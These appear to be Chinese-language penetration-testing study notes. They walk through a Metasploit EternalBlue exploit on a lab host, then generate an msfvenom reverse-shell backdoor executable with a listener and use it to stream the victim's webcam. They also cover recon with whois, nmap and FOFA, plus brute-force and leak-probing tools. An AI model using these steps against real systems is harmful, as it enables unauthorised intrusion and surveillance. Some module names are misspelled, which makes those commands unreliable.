渗透测试

1.1 kail安装

1.2 msf和永恒之蓝

  • msf:metaspoilt

  • 永恒之蓝 windows 17年以前的版本均含有该漏洞

1.3 msf攻击永恒之蓝

  • 进入msf:

    1
    msfconsole
  • 搜索永恒之蓝模块

    1
    search ms17_010
  • 使用模块

    1
    use id/name
  • 查看设置选项

    1
    2
    show options
    options
  • 测试与windows连通性

    注意关闭防火墙

    1
    ping 192.168.179.132
  • 设置RHOST(攻击目标主机)等必选项**

    1
    set RHOST 192.168.179.132 
  • payload设置默认即可

    • LHOST:监听地址(kali本机ip)
    • LPORT:监听端口
  • 运行

    1
    run
  • metteroreter:后渗透模块

  • msfvenom生成远控木马(shell中)

    • 用来生成后门的软件,在目标机上执行后门,在本地监听上线

    • windows可执行程序后门

      1
      msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.179.135 lport=9999 -f exe -o demo.exe
      • -p payload:系统/架构/作用/方式
      • lhost:监听地址
      • lport:监听端口
      • -f format:输出格式
      • -o output:输出文件
    • 开启监听

      1
      2
      3
      4
      5
      use exploit/mutil/handler
      set payload windows/x64/meterpreter/reverse_tcp
      set lhost 192.168.179.135
      set lport 9999
      run
    • 打开摄像头(依据权限)

      1
      meterpreter > webcam_stream

2.1 域名信息收集

  • 查询注册人

    1
    whois 域名
  • 备案信息查询

    1
    icp.chinaz.com

2.2 子域名查询

1
google高级搜索语法

网络空间安全搜索引擎:fofa.so

3.1 IP信息收集

3.2 端口信息收集

  • FTP 21 传输控制信息;20传输数据
    • ftp基础爆破:bruter hydra msf中模块
  • SSH 22
  • Telnet 23
  • SMTP 25/465
  • WWW 80
  • NetBIOS SessionService 139/445 文件和打印机共享
  • MySQL 3306数据库监听端口
  • RDP-3389 远程桌面服务
  • Redis 6379 日志型数据库

Nmap端口扫描:官网有中文文档

1
2
3
nmap -sn -v -T4 -oG Discovery.gnmap 192.168.179.0/24
grep "Status: Up" Discovery.gnmap | cut -f 2 -d '' > liveHosts.txt
cat liveHosts.txt

3.3 其他信息收集

  • WooYun.org等
  • 社会工程学

4.1 网站指纹识别

  • ping

  •   nmap -O -Pn -T4 -A 192.168.179.0/24
    
  • 插件 /开发者工具

  • CMS(内容管理系统)识别:在线识别工具

4.2 敏感文件和目录探测

敏感文件:常见隐藏文件:github、DS_STORE等

  • git泄漏:项目githack
  • svn泄漏

目录探测:御剑、dirsearch